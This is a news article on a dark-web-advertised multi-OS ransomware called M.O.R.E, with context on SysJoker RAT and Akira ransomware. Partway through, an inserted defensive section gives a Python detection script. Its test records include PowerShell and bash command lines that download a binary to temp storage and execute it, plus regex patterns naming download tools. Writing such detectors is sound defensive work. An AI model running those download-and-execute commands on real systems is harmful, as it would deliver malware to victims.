CyberSecurity SEE

A New Dark Web Menace


A new threat has recently emerged on the dark web, which has potential victims across multiple operating systems worried. This new threat, named M.O.R.E (Multi OS Ransomware Executable), has been creating a buzz due to its native compatibility with various operating systems, including Windows, macOS, and Linux. The actor behind this multi-OS ransomware claims it is a game-changer for hacker groups.

According to the seller’s post, which was timestamped at 02:49 AM on Wednesday, February 14, 2024, M.O.R.E offers swift encryption using advanced algorithms like RSA/Chacha20Poly1305. It can crawl through systems and encrypt or decrypt hefty 1024 MB files in a mere 4 seconds. The dynamic multi-threading feature ensures efficient performance across a spectrum of machines, from low-end to high-end systems.

The code snippet provided in the post appears to be a PowerShell script, showcasing its capability to interact with files. However, the content displayed seems to be a jumble of characters and symbols, hinting at possible encryption or corruption. While the exact function of this script remains unclear, it highlights the potential threat posed by M.O.R.E.

This multi-OS ransomware represents an evolution in cyber threats. Unlike traditional ransomware that targets specific operating systems, this new breed can infiltrate and encrypt files across different platforms simultaneously. This capability opens up avenues for cybercriminals to unleash widespread chaos and demand hefty ransoms from victims.

One recent example of multi-OS malware is the SysJoker RAT, as highlighted in a VMware report from the previous year. SysJoker RAT, designed to target Windows, Linux, and macOS, demonstrates the potency of cross-platform malware. By leveraging shared code across multiple platforms, attackers can execute commands remotely and deploy additional malicious payloads with ease.

Moreover, last year, India’s nodal agency for computer security-related threats issued a warning to citizens and organizations regarding the emergence of Akira ransomware, a cross-OS threat targeting organizations around the globe. The Union government’s Computer Emergency Response Team-India (CERT-In) issued the critical advisory, stating that the ransomware targeted both Windows and Linux-based operating systems.

The agency said that the group responsible for the ransomware compromised users via VPN services, particularly where multi-factor authentication was not enabled. The group also used tools such as AnyDesk, WinRAR, and PC Hunter to deceive users into downloading benign-looking files.

Similarly, other malware, RATs, and ransomware can infect multiple operating systems, although they typically target a specific one known to have vulnerabilities. They accomplish this by detecting the OS first and then deploying the payload through wrappers such as PowerShell or Linux bash scripts. These scripts download the malware into temporary storage and execute it. Additionally, the prevalence of Python or Java installations across systems provides a universal medium for malware interpretation and execution.
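One way a defender could hunt for the wrapper behaviour described above (a script interpreter that downloads a file into temporary storage and then executes it) across Windows, Linux, and macOS process logs. This is an added example, not code from the article or the seller's post; the event fields, regex patterns, and sample records are constructed assumptions and are not indicators for M.O.R.E.

```python
import re

# Heuristic signals (assumed patterns, tune for your own telemetry).
SIGNALS = [
    ("fetch", re.compile(r"\b(invoke-webrequest|iwr|downloadfile|curl|wget|urlretrieve)\b", re.I)),
    ("temp", re.compile(r"(\$env:temp|%temp%|\\appdata\\local\\temp\\|/tmp/|/var/tmp/|/dev/shm/)", re.I)),
    ("run", re.compile(r"(start-process|invoke-item|chmod\s+\+x|\bsh\s+/tmp/)", re.I)),
]
# Only script interpreters ("wrappers") are in scope for this rule.
WRAPPER = re.compile(r"(^|[\\/])(powershell|pwsh|bash|sh|zsh|python3?)(\.exe)?$", re.I)

def score(event):
    """Return the names of the signals matched by one process-creation event."""
    if not WRAPPER.search(event["image"]):
        return []
    return [name for name, rx in SIGNALS if rx.search(event["cmdline"])]

def detect(events):
    """Flag events where a wrapper fetches a file, stages it in temp, and runs it."""
    return [e["id"] for e in events if len(score(e)) == len(SIGNALS)]

# Constructed process-creation records (not real telemetry).
EVENTS = [
    {"id": 1, "os": "windows",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -nop -c "iwr https://files.example.invalid/u.bin '
                r'-OutFile $env:TEMP\u.exe; Start-Process $env:TEMP\u.exe"'},
    {"id": 2, "os": "linux", "image": "/usr/bin/bash",
     "cmdline": 'bash -c "curl -s -o /tmp/u https://files.example.invalid/u '
                '&& chmod +x /tmp/u && /tmp/u"'},
    # Benign: download to a user folder, nothing staged in temp or executed.
    {"id": 3, "os": "macos", "image": "/bin/zsh",
     "cmdline": 'zsh -c "curl -fsSL https://pkg.example.invalid/install.sh '
                '-o ~/Downloads/install.sh"'},
    # Benign: interpreter touches /tmp but fetches and runs nothing.
    {"id": 4, "os": "linux", "image": "/usr/bin/python3",
     "cmdline": "python3 /opt/app/cleanup.py --dir /tmp/cache"},
    # Out of scope: not a script interpreter.
    {"id": 5, "os": "linux", "image": "/usr/bin/curl",
     "cmdline": "curl -o /tmp/report.pdf https://intranet.example.invalid/report.pdf"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(e["id"], e["os"], score(e))
    print("flagged:", detect(EVENTS))
```

Requiring all three signals together keeps routine downloads and temp-file housekeeping out of the alert queue; matching on command lines alone will miss encoded or obfuscated invocations, so pair it with file-creation and network telemetry.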

In conclusion, the emergence of M.O.R.E as a multi-OS ransomware tool has raised concerns in the cybersecurity community. Its capability to target multiple operating systems simultaneously represents a significant advancement in the evolving landscape of cyber threats. Organizations and individuals are advised to remain vigilant and take proactive measures to secure their systems against such threats. With the dark web continually evolving, it is imperative for cybersecurity experts to stay one step ahead in protecting against these new and emerging threats.
